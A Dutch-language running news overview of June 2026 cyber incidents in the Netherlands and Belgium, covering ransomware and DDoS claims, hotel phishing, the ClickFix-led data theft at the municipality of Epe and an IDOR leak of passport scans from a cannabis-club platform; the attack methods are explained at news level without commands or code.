Cyberaanvallen 2026 in Nederland en België

Op deze pagina vind je per maand een actueel overzicht van bekende cyberaanvallen, datalekken en ransomware incidenten die relevant zijn voor Nederland, België en Europa.

Actuele Cyberaanvallen

Dagelijks bijgewerkt overzicht van cyberaanvallen, datalekken en dreigingen gericht op Nederlandse en Belgische organisaties.

Actuele cyberaanvallen en datalekken

Doorlopend bijgewerkt overzicht van cyberaanvallen, datalekken en ransomware incidenten die relevant zijn voor Nederland en België.

1.0 Slachtoffers:

02 juni 2026 | Staatssecretaris meldt mogelijk datalek in PI Vught door laptop

Staatssecretaris Van Bruggen van Justitie en Veiligheid heeft de Tweede Kamer geïnformeerd over een potentieel datalek in de Penitentiaire Inrichting (PI) Vught. Het incident betreft een laptop die aan een gedetineerde werd uitgegeven, waarop mogelijk gegevens van een andere gevangene stonden.

Gedetineerden in de PI Vught krijgen toegang tot speciale DSJ laptops om hun eigen strafdossiers digitaal in te zien. Deze laptops zijn strikt geïsoleerd; ze beschikken niet over een internetverbinding of andere faciliteiten en zijn uitsluitend bedoeld voor het raadplegen van het eigen statische strafdossier.

Onlangs meldde een gevangene van de PI Vught dat de DSJ laptop die hij had ontvangen, gegevens van een andere gedetineerde bevatte. De reguliere procedure schrijft voor dat een DSJ laptop na gebruik volledig wordt uitgeschakeld. Dit uitschakelen zorgt ervoor dat alle historie automatisch wordt verwijderd en de machine 'geschoond' wordt, voordat deze aan een volgende gedetineerde mag worden uitgegeven.

De melding van de gedetineerde doet vermoeden dat deze essentiële procedure mogelijk niet is gevolgd. Een dergelijke overtreding zou betekenen dat een gedetineerde inzage heeft gehad in gevoelige informatie van een andere gedetineerde. De staatssecretaris heeft de Tweede Kamer geïnformeerd vanwege de risicostatus van beide gedetineerden, waarbij één van hen momenteel verblijft in de Extra Beveiligde Inrichting (EBI).

Om de exacte toedracht vast te stellen en te bepalen of de werkprocedure inderdaad niet is opgevolgd, is een onderzoek gestart. Mocht uit dit onderzoek blijken dat de betreffende gedetineerde daadwerkelijk inzage heeft gehad in gegevens van een andere gedetineerde, dan zal dit als een datalek worden gemeld bij de Autoriteit Persoonsgegevens.

 

Bron: Tweede Kamer

03 juni 2026 | KHN waarschuwt Nederlandse hotels voor datalek na phishinggolf

Koninklijke Horeca Nederland (KHN) heeft een waarschuwing afgegeven aan hotels in Nederland over een omvangrijk datalek. Volgens de brancheorganisatie hebben gasten van hotels phishingberichten ontvangen als gevolg van dit incident. Hackers zijn erin geslaagd om binnen te dringen in de boekingssystemen van diverse hotels, waarbij gegevens van gasten zijn buitgemaakt.

KHN heeft naar aanleiding van het datalek talloze meldingen ontvangen van slachtoffers die de verdachte phishingberichten hebben ontvangen. De organisatie benadrukt de ernst van de situatie en roept hotels op alert te zijn en passende maatregelen te nemen. Details over de specifieke hotels of de omvang van het datalek zijn niet bekendgemaakt, maar de waarschuwing duidt op een breed probleem dat de Nederlandse hotelsector treft. Het is cruciaal dat hotels hun beveiligingsmaatregelen van boekingssystemen controleren en gasten informeren over mogelijke risico's.

 

Bron: Koninklijke Horeca Nederland (KHN)

03 juni 2026 | Elite Squad claimt DDoS aanvallen op Nederlandse universiteiten

De dreigingsactor Elite Squad heeft geclaimd DDoS aanvallen te hebben uitgevoerd op meerdere websites van Nederlandse universiteiten. Deze beweringen werden ontdekt door Cybercrimeinfo. De acties van Elite Squad zijn specifiek gericht op instellingen in Nederland.

Volgens de claims van de groep zijn de volgende Nederlandse universiteiten het doelwit geweest van de DDoS aanvallen:

*   Universiteit van Amsterdam

*   Erasmus Universiteit Rotterdam

*   Universiteit Leiden

*   Rijksuniversiteit Groningen

*   Universiteit Utrecht

*   Maastricht University

*   Amsterdam University College

Een Distributed Denial of Service (DDoS)-aanval heeft als doel een online dienst ontoegankelijk te maken door deze te overspoelen met een grote hoeveelheid verkeer, waardoor de servers overbelast raken en legitieme gebruikers geen toegang meer krijgen. De claim van Elite Squad omvat een reeks prominente Nederlandse academische instellingen. De alert vermeldt niet of deze aanvallen succesvol waren of wat de huidige operationele status van de websites van de getroffen universiteiten is.

 

Bron: Darkweb

03 juni 2026 | Nederlandse religieuze instelling doelwit STORMOUS ransomware

Cybercrimeinfo ontdekte dat Katholiek Amersfoort, een religieuze instelling gevestigd in Nederland, het vermeende slachtoffer is geworden van de STORMOUS ransomwaregroep. De aanvallers beweren verantwoordelijk te zijn voor een cyberaanval en dreigen de gestolen data op het darkweb te publiceren.

Katholiek Amersfoort, bekend van haar website katholiekamersfoort.nl, is hiermee het meest recente Nederlandse doelwit dat in verband wordt gebracht met ransomware-activiteiten. De claim van de STORMOUS-groep duidt op een mogelijke datadiefstal, wat ernstige gevolgen kan hebben voor de privacy van betrokkenen en de operationele continuïteit van de instelling. Het publiceren van data op het darkweb is een veelgebruikte tactiek van ransomwaregroepen om druk uit te oefenen op slachtoffers om losgeld te betalen.

De melding van deze aanval benadrukt de aanhoudende dreiging van ransomware voor organisaties van elke omvang en sector, inclusief religieuze instellingen. Het is cruciaal voor alle entiteiten om robuuste cybersecuritymaatregelen te implementeren en incidentresponsplannen paraat te hebben om dergelijke aanvallen te mitigeren en de impact ervan te beperken.

 

Bron: Darkweb

03 juni 2026 | NoName claimt DDoS aanvallen op VDL Bus & Coach en VDL Group

Cybercrimeinfo heeft een melding ontvangen over vermeende DDoS aanvallen gericht op Nederlandse entiteiten. De dreigingsactor, bekend onder de naam NoName, claimt verantwoordelijk te zijn voor deze aanvallen. Specifieke doelwitten die door NoName zijn genoemd, betreffen VDL Bus & Coach en VDL Group.

Deze aanvallen zouden gericht zijn op meerdere websites binnen Nederland. DDoS aanvallen (Distributed Denial of Service) zijn methodes waarbij aanvallers proberen om online diensten en websites onbereikbaar te maken. Dit doen zij door de servers te overspoelen met een overweldigende hoeveelheid netwerkverkeer, afkomstig van een groot aantal gecompromitteerde computers of apparaten. Het gevolg hiervan is dat legitieme gebruikers geen toegang meer kunnen krijgen tot de getroffen diensten, wat kan leiden tot operationele verstoringen en financiële schade voor de getroffen organisaties.

De claims van NoName zijn op dit moment niet onafhankelijk bevestigd door de getroffen partijen of externe monitoringdiensten. De exacte aard en omvang van de vermeende aanvallen, evenals de eventuele impact op de operationele continuïteit van VDL Bus & Coach en VDL Group, zijn momenteel onduidelijk. Cybercrimeinfo blijft de situatie nauwlettend volgen voor verdere ontwikkelingen en officiële bevestigingen van de claims.

 

Bron: Darkweb

03 juni 2026 | Waarschuwing voor phishing namens Christelijke Mutualiteit

Er circuleren momenteel phishingberichten die misbruik maken van de naam van de Christelijke Mutualiteit in België. Deze e-mails verzoeken ontvangers om bepaalde accountgegevens te bevestigen voor een zogenaamde "administratieve controle". Dit betreft een poging tot oplichting, waarbij cybercriminelen proberen persoonlijke gegevens van de slachtoffers te bemachtigen.

Safeonweb.be waarschuwt dat dergelijke frauduleuze berichten vaak te herkennen zijn aan specifieke kenmerken. Zo wordt de ontvanger gevraagd op een link te klikken om gegevens te "bevestigen" of "aan te vullen". Deze link leidt vervolgens naar een valse website die de officiële website van de Christelijke Mutualiteit nabootst. Een ander kenmerk is het e-mailadres van de afzender, dat er vaak vreemd uitziet of kleine afwijkingen bevat, zoals overbodige letters, spelfouten of ongebruikelijke tekens. Hoewel de weergegeven afzendernaam legitiem kan lijken, is het raadzaam om op de naam te klikken of tikken om het volledige e-mailadres te controleren.

Om niet in de val te trappen, adviseert Safeonweb.be om niet op links in dergelijke verdachte e-mails te klikken, geen bijlagen te openen en geen applicaties te downloaden die in het bericht worden gevraagd. Ontvangers van deze phishingberichten wordt dringend geadviseerd de verdachte e-mail door te sturen naar verdacht@safeonweb.be.

Indien men onverhoopt toch op een link heeft geklikt, is het cruciaal om geen gegevens in te vullen en de pagina onmiddellijk te sluiten. Er mogen nooit persoonlijke codes worden doorgegeven. Als een wachtwoord is ingevoerd dat ook elders wordt gebruikt, dient dit wachtwoord onmiddellijk te worden gewijzigd. Wanneer er geld verloren is gegaan door de oplichting, is het van belang snel actie te ondernemen en het advies op de website van Safeonweb.be te volgen.

 

Bron: Safeonweb

04 juni 2026 | Belgische hotelgasten verliezen duizenden euro's na datalek en phishing

Een datalek dat zowel Nederlandse als Belgische hotels raakt, heeft geleid tot aanzienlijke financiële verliezen voor tal van hotelgasten. Volgens berichtgeving van Het Laatste Nieuws (HLN) zijn slachtoffers in sommige gevallen duizenden euro's kwijtgeraakt door gerichte phishingaanvallen die volgden op het datalek. Eerder werd al bekend dat zeker honderd Nederlandse hotels getroffen zijn.

De aanvallers slaagden erin om op nog onbekende wijze reserveringsgegevens te stelen van een onbekend aantal hotels en hun gasten. Deze gestolen informatie werd vervolgens ingezet voor gerichte phishingcampagnes, waarbij slachtoffers onder andere via WhatsApp werden benaderd. In de phishingberichten werd beweerd dat de ontvanger nog een openstaand bedrag moest voldoen. Er werd gedreigd met de onherroepelijke annulering van de hotelreservering indien de betaling niet binnen een gestelde termijn zou plaatsvinden.

Colin Dearman, manager van hotel Astoria in De Haan, België, heeft tegenover HLN bevestigd dat sommige gasten op deze wijze voor duizenden euro's zijn opgelicht. De omvang van het verlies varieerde afhankelijk van de duur van het geplande verblijf. Opvallend is dat mensen die hun reservering telefonisch bij de hotels hadden gemaakt, geen doelwit zijn geworden van deze phishingaanvallen.

Volgens hoteliers lijkt de "gemene deler" van alle getroffen hotels het online reserveringssysteem te zijn waarmee zij werken. Dit systeem is ontwikkeld door het Gentse softwarebedrijf Lighthouse. De software koppelt hoteladministraties aan diverse online boekingssites, waaronder Booking.com, en verzamelt centraal alle reserveringen en klantgegevens. Het Laatste Nieuws suggereert dat Lighthouse mogelijk gehackt is. Echter, in een reactie heeft Lighthouse aangegeven dat er nog geen aanwijzingen zijn gevonden voor ongeautoriseerde toegang tot hun systemen.

 

Bron: Het Laatste Nieuws

05 juni 2026 | Politie waarschuwt voor nepberichten over verhoogde banklimiet

De Nederlandse politie heeft recentelijk via haar Instagram-kanaal een urgente waarschuwing uitgegeven betreffende frauduleuze berichten die op bedrieglijke wijze de indruk wekken afkomstig te zijn van de Rabobank. Deze zorgwekkende berichten worden actief verspreid door cybercriminelen en zijn specifiek ontworpen om ontvangers te misleiden. In de valse communicatie wordt de ontvanger geïnformeerd dat de daglimiet van hun bankrekening succesvol is verhoogd naar een aanzienlijk bedrag van 54.000 euro. Het doel van deze mededeling is om onrust te zaaien en een gevoel van urgentie te creëren, waardoor slachtoffers sneller geneigd zijn tot actie over te gaan.

De afzenders van deze geraffineerde nepberichten instrueren de ontvanger om onmiddellijk contact op te nemen met een specifiek, in het bericht vermeld, telefoonnummer. Dit contact is vereist als de ontvanger deze substantiële limietverhoging niet zelf heeft aangevraagd. Deze tactiek is een klassiek voorbeeld van bankhelpdeskfraude, een veelvoorkomende vorm van cybercriminaliteit waarbij oplichters zich voordoen als bankmedewerkers om het vertrouwen van slachtoffers te winnen.

Zodra een argeloze ontvanger het in het nepbericht opgegeven telefoonnummer belt, komen zij in contact met de cybercriminelen. Deze criminelen proberen vervolgens via uitgekiende social engineering technieken toegang te verkrijgen tot de bankrekening van het slachtoffer. Dit kan op verschillende manieren gebeuren: door het ontfutselen van inloggegevens, het overtuigen van het slachtoffer om persoonlijke bankgegevens te delen, of zelfs door het slachtoffer te manipuleren om zelfstandig een geldbedrag over te maken naar een bankrekening die onder controle staat van de fraudeurs. De valse melding van een verhoogde daglimiet van 54.000 euro dient hierbij als een krachtig lokmiddel om angst en paniek te zaaien, waardoor slachtoffers minder kritisch worden en sneller geneigd zijn tot actie over te gaan.

De politie benadrukt met klem het belang van waakzaamheid bij het ontvangen van dergelijke ongevraagde en verdachte berichten. Het dringende advies aan alle burgers is om het telefoonnummer dat in het frauduleuze bericht wordt vermeld, onder geen enkele omstandigheid te bellen. Bij enige twijfel over de authenticiteit van een bericht van een bank, is het cruciaal om altijd zelfstandig en proactief contact op te nemen met de betreffende financiële instelling. Dit dient uitsluitend te gebeuren via de officiële en geverifieerde communicatiekanalen van de bank, zoals de officiële website of de mobiele applicatie. Deze kanalen bieden de enige betrouwbare en veilige manier om de geldigheid van dergelijke berichten te controleren en zo te voorkomen dat men slachtoffer wordt van geavanceerde fraude.

 

Bron: Politie

06 juni 2026 | 871 GB aan persoonsgegevens gestolen bij gemeente Epe via ClickFix

De gemeente Epe is het slachtoffer geworden van een cyberaanval waarbij een aanvaller het wachtwoord van een beheerder kraakte en toegang verkreeg tot een noodaccount. Als gevolg hiervan is 871 gigabyte aan data buitgemaakt, waaronder een export uit de Basisregistratie Personen (BRP) met gevoelige persoonsgegevens van inwoners. Dit blijkt uit een interne evaluatie van het datalek, zoals door de gemeente gepubliceerd.

De aanval begon op 10 maart dit jaar, toen een aanvaller via een zogeheten ClickFix-aanval toegang wist te verkrijgen tot het systeem van een gemeentemedewerker. Bij een aanval van het type ClickFix worden slachtoffers misleid om specifieke commando's op hun computer uit te voeren. Dit gebeurt vaak door middel van malafide CAPTCHA-pagina's die een schadelijk PowerShell commando naar het klembord kopiëren, waarna de gebruiker wordt geïnstrueerd dit commando uit te voeren in het Uitvoervenster of de Windows Terminal.

Nadat de aanvaller voet aan de grond had gekregen op het systeem van de medewerker, werd gezocht naar andere ingelogde gebruikers. Door een kerberosticket van een ingelogde beheerder te ontsleutelen, lukte het de aanvaller om het bijbehorende wachtwoord te kraken en zo toegang te krijgen via diens ticket. Vervolgens werd ook toegang verkregen tot een noodaccount, dat over uitgebreide toegangsrechten op het systeem beschikte. De gemeente stelt dat dit noodaccount, dat als een 'loper' kan worden gezien, in de regel geen meervoudige authenticatie (MFA) heeft omdat het bedoeld is voor noodtoegang. Echter, er waren onvoldoende aanvullende beveiligingsmaatregelen getroffen voor dit account, waardoor de aanvaller vergaande rechten kon verkrijgen.

Met de verworven toegang kopieerde de aanvaller met behulp van het programma AzCopy circa 871 gigabyte aan data, verspreid over ruim 550.000 bestanden, naar een externe cloudopslag, een Azure Blob Storage. De gestolen data was afkomstig van een interne bestandsserver die op korte termijn zou worden uitgefaseerd, in verband met een geplande migratie naar SharePoint en Microsoft Teams.

De buitgemaakte gegevens omvatten een export uit de BRP met persoonsgegevens van inwoners, zoals naam, adres, geslacht, woonplaats, geboortedatum en Burgerservicenummer (BSN). Daarnaast werden persoonsgegevens van medewerkers gestolen, waaronder namen, e-mailadressen, zakelijke telefoonnummers, datum indiensttreding en profielfoto's. Ook financiële gegevens van de gemeente en haar relaties, aanvragen voor gemeentelijke voorzieningen, meldingen van overlast of verstoring van de openbare orde, en kopieën van ongeveer duizend identiteitsbewijzen behoorden tot de gestolen informatie. De gemeente Epe heeft bevestigd dat de gestolen gegevens op het moment van schrijven niet zijn gepubliceerd op bekende leksites of marktplaatsen, dat er geen losgeld is geëist en dat er geen indicaties zijn van misbruik van de data.

Naar aanleiding van het incident heeft de gemeente verschillende lessen getrokken. De aanval begon met social engineering, wat benadrukt dat technische maatregelen alleen niet volstaan en medewerkers getraind moeten worden om verdachte situaties te herkennen en te melden. Het bewustwordingsprogramma voor medewerkers zal worden vernieuwd. Verder zijn werkprocessen aangepast om de opslag van gevoelige gegevens, zoals data-exports en kopieën van identiteitsbewijzen, te voorkomen. Ook is het gebruik van PowerShell en het Run-venster voor standaardgebruikers beperkt en is de netwerksegmentatie aangescherpt.

 

Bron: Gemeente Epe | Bron 2: radar.avrotros.nl | Bron 3: rijksoverheid.nl

06 juni 2026 | Datalek bij zakenreisbureau BCD Travel treft 396.000 accounts

De criminele groepering ShinyHunters claimt een datalek te hebben veroorzaakt bij het Nederlandse zakenreisbureau BCD Travel. De gestolen data zou gegevens van 396.000 accounts omvatten. Dit nieuws is bevestigd door beveiligingsonderzoeker Troy Hunt, oprichter van de datalekzoekmachine Have I Been Pwned, die de 396.000 e-mailadressen van de betrokken accounts aan zijn website heeft toegevoegd. Op de officiële website van BCD Travel is momenteel geen informatie over het mogelijke datalek te vinden.

Eerder liet BCD Travel aan het FD weten dat het recentelijk verdachte activiteit had waargenomen via een intern gebruikt account. Na deze ontdekking is direct een onderzoek gestart om de aard en omvang van de activiteiten vast te stellen, welk onderzoek nog gaande is. ShinyHunters maakte eind vorige maand bekend de systemen van BCD Travel te hebben gehackt en stelde een ultimatum voor losgeld, met een deadline van 1 juni. Toen deze deadline verstreek, publiceerden de cybercriminelen eerder deze week een dataset van dertig gigabyte, die afkomstig zou zijn van BCD Travel. De groep beweert in totaal de gegevens van meer dan 700.000 accounts te hebben buitgemaakt.

De dataset bevat, naast andere informatie, de 396.000 e-mailadressen die nu zijn opgenomen in de database van Have I Been Pwned. Deze website stelt gebruikers in staat te controleren of hun e-mailadres is betrokken bij bekende datalekken. Opvallend is dat slechts 28 procent van de e-mailadressen die nu bij BCD Travel zouden zijn gestolen, al bekend was via een eerder datalek bij Have I Been Pwned. Dit percentage is aanzienlijk lager dan bij veel andere datalekken, waar een groter deel van de gelekte adressen al eerder in omloop bleek te zijn.

 

Bron: Have I Been Pwned

07 juni 2026 | Belgische vrouw verliest spaargeld door geraffineerde online oplichting met nepvacature

Een alleenstaande moeder uit Aarschot, de 45-jarige Ellie Dewinter, is al haar spaargeld kwijtgeraakt door een geraffineerde vorm van online oplichting. Dewinter solliciteerde online voor een flexi-job in het weekend, in de hoop wat extra geld te verdienen. Binnen enkele minuten na haar online sollicitatie was haar rekening leeggeplunderd. Ze verklaarde: "In 5 minuten tijd was ik alles kwijt." Het ging om geld waarvoor ze maandenlang had gespaard.

De internetcriminelen gingen volgens de politie zeer gewiekst te werk. Hoewel de specifieke methoden van de oplichters niet in detail zijn beschreven, waarschuwt de politie voor het belang van voorzichtigheid bij online sollicitaties. Een belangrijke indicator voor potentiële fraude is wanneer er sprake is van haast. "Als er haast bij is, klopt er iets niet," aldus de waarschuwing van de politie, die benadrukt dat dit een veelvoorkomend kenmerk is van dergelijke zwendelpraktijken. Het incident onderstreept de noodzaak voor burgers om alert te zijn op verdachte signalen bij online interacties, vooral wanneer financiële gegevens of snelle beslissingen worden gevraagd.

 

Bron: HLN.be

09 juni 2026 | Verlopen domeinnamen van bewindvoerders leiden tot datalek van cliëntgegevens

Verlopen en opgezegde domeinnamen van bewindvoerders zorgen ervoor dat gevoelige informatie van cliënten in handen van derden kan vallen. Dit werd vandaag gemeld door RTL Nieuws. Bewindvoerders zijn verantwoordelijk voor het regelen van de financiële zaken van personen die dit zelf niet kunnen, zoals mensen met een verstandelijke beperking, overmatig geldgebruik of problematische schulden, zo licht de Rijksoverheid toe.

Een onderzoeker ontdekte in gelekte data van telecombedrijf Odido dat veel mensen het e-mailadres van hun bewindvoerder hadden gebruikt. Volgens het rapport van RTL Nieuws zijn in de afgelopen jaren veel bewindvoerders gefuseerd of overgenomen door andere organisaties. Als gevolg hiervan zijn domeinnamen opgezegd of verlopen. Door deze domeinnamen opnieuw te registreren, was het mogelijk om diverse gevoelige gegevens van cliënten te ontvangen. De onderzoeker kreeg op deze wijze toegang tot 258 financiële dossiers.

Aegis, de branchevereniging voor bewindvoering, heeft aangekondigd haar leden te zullen waarschuwen voor de risico’s van verlopen en opgezegde domeinnamen. De vereniging benadrukt de noodzaak van extra alertheid, gezien de gevoeligheid van de informatie waarover bewindvoerders beschikken en de kwetsbaarheid van veel van hun cliënten. Aegis is van plan leden voor te lichten over deze risico’s en onderzoekt de mogelijkheid om een protocol te ontwikkelen voor dit soort incidenten.

De Stichting Internet Domeinregistratie Nederland (SIDN), de organisatie die de .nl-domeinnamen beheert, bevestigde tegenover RTL Nieuws dat het probleem van datalekken door opgegeven domeinnamen nog steeds actueel is. De onderzoeker die de kwetsbaarheid aan het licht bracht, heeft de meest populaire domeinnamen van bewindvoerders die in het Odido datalek voorkwamen en die nog beschikbaar waren, inmiddels geregistreerd om verder misbruik te voorkomen.

 

Bron: Rijksoverheid

09 juni 2026 | Gemeente Eindhoven meldt datalek door gebruik openbare AI diensten

De gemeente Eindhoven heeft een datalek gemeld bij de Autoriteit Persoonsgegevens (AP) op 23 oktober 2025, nadat medewerkers gevoelige documenten hadden geplakt in openbare AI diensten zoals ChatGPT. Tussen 23 september en 23 oktober 2025 ontdekte de gemeente via een eigen steekproef dat ruim duizend documenten met persoonsgegevens op deze manier waren verwerkt.

Het betrof gevoelige informatie van kwetsbare inwoners, waaronder dossiers in het kader van de Jeugdwet, reflectieverslagen, cv's en gegevens over jeugdproblematiek en mentale gezondheid. Het datalek ontstond doordat de medewerkers vertrouwelijke bestanden plakten in de gratis, openbare versies van AI modellen. Bij dergelijke diensten kan ingevoerde data als trainingsdata worden gebruikt en potentieel elders opduiken.

Na de ontdekking en melding bij de AP blokkeerde de gemeente Eindhoven onmiddellijk alle openbare AI websites voor haar medewerkers. Sindsdien is het personeel alleen nog toegestaan om Microsoft Copilot te gebruiken binnen de beveiligde gemeentelijke omgeving. Dit incident werd door NOS Nieuwsuur naar buiten gebracht als een waarschuwing voor andere organisaties die hun personeel met AI laten werken.

 

Bron: Gemeente Eindhoven

10 juni 2026 | Bijna 100 Vlaamse hotels getroffen door gerichte phishingaanval

Bijna honderd Vlaamse hotels zijn de afgelopen week getroffen door een geavanceerde phishingaanval. Hotelgasten ontvangen daarbij verdachte berichten via WhatsApp of andere communicatiekanalen. Deze berichten bevatten correcte reserveringsgegevens, zoals de naam van de gast, de boekingsreferentie en de verblijfsdata, wat de phishingcampagne bijzonder geloofwaardig maakt. Na het tonen van deze correcte informatie worden de gasten doorgestuurd naar een valse betaalpagina, met als uiteindelijk doel het stelen van hun betalingsgegevens.

Horeca Vlaanderen heeft de ernst van de situatie benadrukt in een persbericht en heeft de problematiek aangekaart bij minister van Consumentenzaken Rob Beenders (Vooruit). De sectororganisatie ontving meldingen van bijna honderd getroffen hotels, waarvan meer dan een derde aangaf in de afgelopen dagen meer dan 25 klachten van klanten te hebben ontvangen over de verdachte berichten. De impact van deze aanval is aanzienlijk en beïnvloedt de dagelijkse bedrijfsvoering van de hotels. Personeel ervaart aanzienlijk tijdsverlies door het afhandelen van vragen en klachten, wat leidt tot reputatieschade en ontevredenheid bij gasten. Bovendien is de phishingcampagne nog steeds actief.

Horeca Vlaanderen uit grote bezorgdheid over de situatie en de onduidelijkheid die hierdoor ontstaat. Om haar leden te ondersteunen, heeft de organisatie praktische aanbevelingen en richtlijnen verspreid over maatregelen die hotels zelf kunnen nemen om de risico's te beperken. Matthias De Caluwé, CEO van Horeca Vlaanderen, roept hotelgasten op tot extra waakzaamheid bij onverwachte of verdachte communicatie over betalingen of reserveringen. Hij adviseert bij twijfel altijd direct contact op te nemen met het betreffende hotel en dergelijke incidenten te rapporteren.

Minister Beenders heeft aangegeven de signalen "bijzonder ernstig" te nemen. Hij merkt op dat criminelen steeds vaker misbruik maken van het vertrouwen van zowel consumenten als ondernemers. De minister benadrukt het belang van snelle meldingen van mogelijke fraudegevallen en heeft gepaste acties beloofd. Verdachte berichten of pogingen tot oplichting kunnen gemeld worden via het officiële meldpunt van de overheid op safeonweb.be/nl/opgelicht.

 

Bron: Horeca Vlaanderen | Bron 2: safeonweb.be

11 juni 2026 | Dataset met gegevens van 10.000 Belgische padelspelers aangeboden op darkweb

Deze dataset zou afkomstig zijn van Appadel, een padelplatform dat geassocieerd wordt met de padelfederatie van Wallonië en Brussel in België. De aanbieder claimt dat de dataset gegevens bevat van ongeveer 10.000 gebruikers.

Volgens de dreigingsactor omvat de gelekte informatie affiliatienummers, officiële namen, voornamen en achternamen, geslacht, leeftijdscategorie, ELO punten en de schorsingsstatus van de spelers. Daarnaast zouden e-mailadressen, datums van accountcreatie en -wijziging, locatiegegevens met breedtegraad en lengtegraad, licentietype en prijs, nationaliteit, de huidige club en URL's naar profielfoto's deel uitmaken van de dataset.

Als bewijs voor de authenticiteit van de claim is een sample van de gegevens gepubliceerd. De volledige download van de dataset is echter alleen beschikbaar na betaling met punten op het darkwebforum. Het is belangrijk te benadrukken dat deze claim niet onafhankelijk is geverifieerd.

Leden van de padelfederatie die gebruikmaken van het platform Appadel doen er goed aan om extra alert te zijn op mogelijke phishingpogingen en worden geadviseerd hun wachtwoorden te wijzigen als voorzorgsmaatregel.

 

Bron: Cybercrimeinfo

11 juni 2026 | Nieuwe massaclaim om datalek bevolkingsonderzoek baarmoederhalskanker, ook tegen ministerie van VWS

Het Vrouwenrechtencollectief heeft een massaclaim geïnitieerd naar aanleiding van het grootschalige datalek bij laboratorium Clinical Diagnostics in Rijswijk. Dit lek betrof medische gegevens van honderdduizenden vrouwen die deelnamen aan het landelijke bevolkingsonderzoek naar baarmoederhalskanker. Vrouwen die door dit incident zijn getroffen, kunnen zich vanaf heden aanmelden bij het collectief om zich bij de claim aan te sluiten.

De juridische actie van het Vrouwenrechtencollectief richt zich niet alleen op Clinical Diagnostics, maar ook op het ministerie van Volksgezondheid, Welzijn en Sport (VWS). Een primair doel van het collectief is om de gedupeerde vrouwen te ondersteunen bij het verkrijgen van inzage in de gestolen gegevens, zodat zij precies kunnen vaststellen welke informatie van hen in verkeerde handen is gevallen en welke potentiële risico's dit met zich meebrengt.

Eerder onderzoek van de Inspectie Gezondheidszorg en Jeugd (IGJ) wees uit dat het laboratorium de medische gegevens onvoldoende had beveiligd. Clinical Diagnostics bleek niet te voldoen aan de NEN 7510-norm, de Nederlandse norm voor informatiebeveiliging binnen de zorgsector. Bij het datalek, waarvoor de criminele hackergroep Nova de verantwoordelijkheid heeft opgeëist, werden gegevens van minimaal 700.000 vrouwen buitgemaakt.

Dit incident is een van de grootste medische datalekken in de Nederlandse geschiedenis. Eerder waren al twee advocatenkantoren vergelijkbare juridische procedures gestart om hetzelfde datalek.

 

Bron: Vrouwenrechtencollectief

12 juni 2026 | Registratieplatform cannabisclubs lekt bijna miljoen paspoorten en medische gegevens

Een registratieplatform dat wordt gebruikt door cannabisclubs heeft kopieën van bijna één miljoen paspoorten gelekt, naast persoonlijke en medische gegevens van meer dan een miljoen mensen. Onder de getroffen personen bevinden zich zevenduizend mensen uit Nederland en bijna achtduizend uit België. De gelekte informatie was zonder enige vorm van authenticatie voor iedereen op het internet toegankelijk.

Cannabisclubs zijn actief in verschillende landen en vereisen dat leden bij registratie hun naam, adresgegevens, telefoonnummer, e-mailadres, geboortedatum, nationaliteit en een scan van hun paspoort of identiteitsbewijs verstrekken. Ook wordt bijgehouden of het cannabisgebruik voor medicinale doeleinden is, wat als medische informatie kwalificeert.

De kwetsbaarheid werd ontdekt door onderzoeker Sammy Azdoufal. Hij traceerde het lek via de app 'PuffPal', die een QR-code genereert voor snelle toegang tot clubs en ook bestellingen mogelijk maakt. De app leidde de onderzoeker naar een API van de gebruikersprofielen, die een Insecure Direct Object Reference (IDOR) kwetsbaarheid bevatte. IDOR ontstaat wanneer een webapplicatie of API een identifier gebruikt om objecten in een database op te vragen zonder voldoende authenticatie of toegangscontrole, waardoor een gebruiker door het aanpassen van data toegang krijgt tot gegevens van andere gebruikers.

De 'user_id' parameter die door de API werd gebruikt, was een opeenvolgend getal. Er was geen authenticatietoken, sessiecookie of API-sleutel vereist. Hierdoor kon de onderzoeker door simpelweg een getal in de ID te wijzigen, toegang krijgen tot de gegevens van meer dan een miljoen leden. Naast de eerder genoemde registratiegegevens omvatte dit ook het maandelijkse cannabisgebruik en cannabisvoorkeuren.

Azdoufal ontdekte nog een ander significant beveiligingsprobleem in de onderliggende infrastructuur. Tijdens de registratie uploaden clubs foto's van nieuwe leden naar de server, waar de afbeeldingen op een voorspelbare locatie worden opgeslagen. Deze URL was zonder toegangstoken of andere authenticatie voor iedereen op het internet toegankelijk. Volgens Azdoufal was "het meest gevoelige bestand in het hele systeem, het bestand dat bewijst wie je bent, het minst beveiligde bestand". Door dit probleem waren bijna 986.000 paspoortfoto's te downloaden.

De gelekte gegevens bevatten ook informatie over het medicinale cannabisgebruik van meer dan een miljoen leden, wat deze informatie tot gezondheidsgegevens maakt. Deze gegevens vallen onder de extra bescherming van de Algemene Verordening Gegevensbescherming (AVG). Azdoufal meldde de problemen eind april herhaaldelijk aan de betreffende softwareontwikkelaar, maar ontving geen reactie. Na contact met The Verge kwam het bedrijf in actie en meldde op 10 juni dat alle problemen waren verholpen.

 

Bron: Sammy Azdoufal | Bron 2: github.com

12 juni 2026 | Nederlands familiebedrijf Van Tuijl geclaimd als slachtoffer van LockBit5 ransomware

Cybercrimeinfo heeft op het darkweb waargenomen dat de ransomwaregroep LockBit5 claimt het Nederlandse familiebedrijf Van Tuijl (vth.nl) te hebben getroffen. De claim verscheen op 11 juni 2026 op de leksite van de groep. Van Tuijl, gevestigd in Haaften, levert al ruim honderd jaar producten voor de land- en tuinbouw, waaronder potten en trays, en is actief in tientallen landen. Het bedrijf zou daarmee het meest recente Nederlandse doelwit van deze criminele organisatie zijn.

De LockBit5 ransomware groep staat erom bekend dat zij bedrijfsdata stelen en vervolgens versleutelen. Na de succesvolle inbraak wordt losgeld geëist van het getroffen bedrijf in ruil voor het herstellen van de toegang tot de data en het voorkomen van publicatie van de gestolen informatie. Details over de specifieke aard van de gestolen data of de omvang van de aanval zijn op dit moment niet bekendgemaakt. De claim van LockBit5 verscheen op het darkweb, waar de groep doorgaans gestolen data publiceert indien losgeld niet wordt betaald.

De vermeende aanval op Van Tuijl onderstreept de aanhoudende dreiging van ransomware voor Nederlandse bedrijven. Organisaties worden voortdurend geconfronteerd met geavanceerde cybercriminelen die methoden ontwikkelen om systemen te infiltreren en financiële winst te behalen door middel van datadiefstal en encryptie.

 

Bron: Cybercrimeinfo

12 juni 2026 | Kredietbank Limburg getroffen door cyberaanval, phishingmails naar clienten verstuurd

